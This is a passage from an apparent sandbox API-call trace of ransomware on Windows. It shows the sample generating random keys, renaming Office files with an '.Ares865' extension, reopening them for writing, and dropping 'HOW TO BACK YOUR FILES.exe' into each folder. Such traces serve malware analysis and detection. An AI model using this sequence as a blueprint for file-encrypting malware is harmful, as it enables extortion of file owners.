szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0070.095] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0070.095] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.095] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.DE.XML.Ares865") returned 83 [0070.095] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.DE.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.de.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.DE.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.de.xml.ares865"), dwFlags=0x1) returned 1 [0070.096] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.DE.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.de.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0070.096] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=804) returned 1 [0070.096] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0070.097] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0070.097] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.113] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0070.114] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0070.114] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.114] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.ES.XML.Ares865") returned 83 [0070.114] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.ES.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.es.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.ES.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.es.xml.ares865"), dwFlags=0x1) returned 1 [0070.115] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.ES.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.es.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0070.115] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=808) returned 1 [0070.116] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0070.116] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0070.116] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.126] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0070.126] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0070.126] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.127] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.FR.XML.Ares865") returned 83 [0070.127] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.FR.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.fr.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.FR.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.fr.xml.ares865"), dwFlags=0x1) returned 1 [0070.128] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.FR.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.fr.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0070.128] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=804) returned 1 [0070.128] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0070.129] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0070.129] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.131] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0070.131] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0070.131] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.132] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.HK.XML.Ares865") returned 83 [0070.167] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.HK.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.hk.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.HK.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.hk.xml.ares865"), dwFlags=0x1) returned 1 [0070.168] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.HK.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.hk.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0070.168] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=806) returned 1 [0070.168] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0070.169] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0070.169] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.172] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0070.172] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0070.173] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.173] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.IE.XML.Ares865") returned 83 [0070.173] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.IE.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.ie.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.IE.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.ie.xml.ares865"), dwFlags=0x1) returned 1 [0070.174] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.IE.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.ie.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0070.174] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=810) returned 1 [0070.174] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0070.175] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0070.175] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.182] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0070.197] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0070.199] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.200] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.IT.XML.Ares865") returned 83 [0070.200] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.IT.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.it.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.IT.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.it.xml.ares865"), dwFlags=0x1) returned 1 [0070.201] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.IT.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.it.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0070.201] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=804) returned 1 [0070.201] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0070.202] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0070.202] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.204] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0070.205] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0070.205] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.205] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.JP.XML.Ares865") returned 83 [0070.206] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.JP.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.jp.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.JP.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.jp.xml.ares865"), dwFlags=0x1) returned 1 [0070.206] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.JP.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.jp.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0070.206] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=817) returned 1 [0070.207] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0070.207] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0070.207] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.210] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0070.211] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0070.211] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.211] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.NO.XML.Ares865") returned 83 [0070.211] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.NO.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.no.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.NO.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.no.xml.ares865"), dwFlags=0x1) returned 1 [0070.212] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.NO.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.no.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0070.212] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=806) returned 1 [0070.212] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0070.213] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0070.213] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.215] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0070.216] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0070.216] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.217] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.PL.XML.Ares865") returned 83 [0070.217] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.PL.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.pl.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.PL.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.pl.xml.ares865"), dwFlags=0x1) returned 1 [0070.218] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.PL.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.pl.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0070.218] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=806) returned 1 [0070.218] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0070.219] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0070.219] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.221] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0070.221] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0070.222] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.222] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.SE.XML.Ares865") returned 83 [0070.222] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.SE.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.se.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.SE.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.se.xml.ares865"), dwFlags=0x1) returned 1 [0070.223] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.SE.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.se.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0070.223] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=806) returned 1 [0070.223] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0070.224] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0070.224] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.227] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0070.228] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0070.228] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.228] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\OneNote", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\OneNote") returned="C:\\Program Files\\Microsoft Office\\Office14\\OneNote" [0070.228] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4940 | out: hHeap=0x2b0000) returned 1 [0070.228] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0070.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\OneNote") returned 50 [0070.228] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\OneNote" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\OneNote") returned="C:\\Program Files\\Microsoft Office\\Office14\\OneNote" [0070.228] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0070.228] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OneNote\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\onenote\\how to back your files.exe"), bFailIfExists=1) returned 1 [0070.455] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.455] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OneNote\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5b5e2180, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5b5e2180, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0070.456] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0070.456] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0070.456] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OneNote\\SendToOneNote-PipelineConfig.xml.Ares865") returned 91 [0070.456] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OneNote\\SendToOneNote-PipelineConfig.xml" (normalized: "c:\\program files\\microsoft office\\office14\\onenote\\sendtoonenote-pipelineconfig.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OneNote\\SendToOneNote-PipelineConfig.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\onenote\\sendtoonenote-pipelineconfig.xml.ares865"), dwFlags=0x1) returned 1 [0070.541] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OneNote\\SendToOneNote-PipelineConfig.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\onenote\\sendtoonenote-pipelineconfig.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0070.541] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=506) returned 1 [0070.542] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0070.542] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0070.542] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.599] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0070.605] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0070.605] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.605] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA") returned="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA" [0070.605] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e48d0 | out: hHeap=0x2b0000) returned 1 [0070.606] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2500 | out: hHeap=0x2b0000) returned 1 [0070.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA") returned 48 [0070.606] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA") returned="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA" [0070.606] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0070.606] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\media\\how to back your files.exe"), bFailIfExists=1) returned 1 [0070.733] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.733] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\MEDIA\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5baa4d80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5baa4d80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0070.733] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0070.733] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0070.734] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Library", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Library") returned="C:\\Program Files\\Microsoft Office\\Office14\\Library" [0070.734] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4860 | out: hHeap=0x2b0000) returned 1 [0070.734] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24e0 | out: hHeap=0x2b0000) returned 1 [0070.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Library") returned 50 [0070.734] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Library" | out: lpString1="C:\\Program Files\\Microsoft 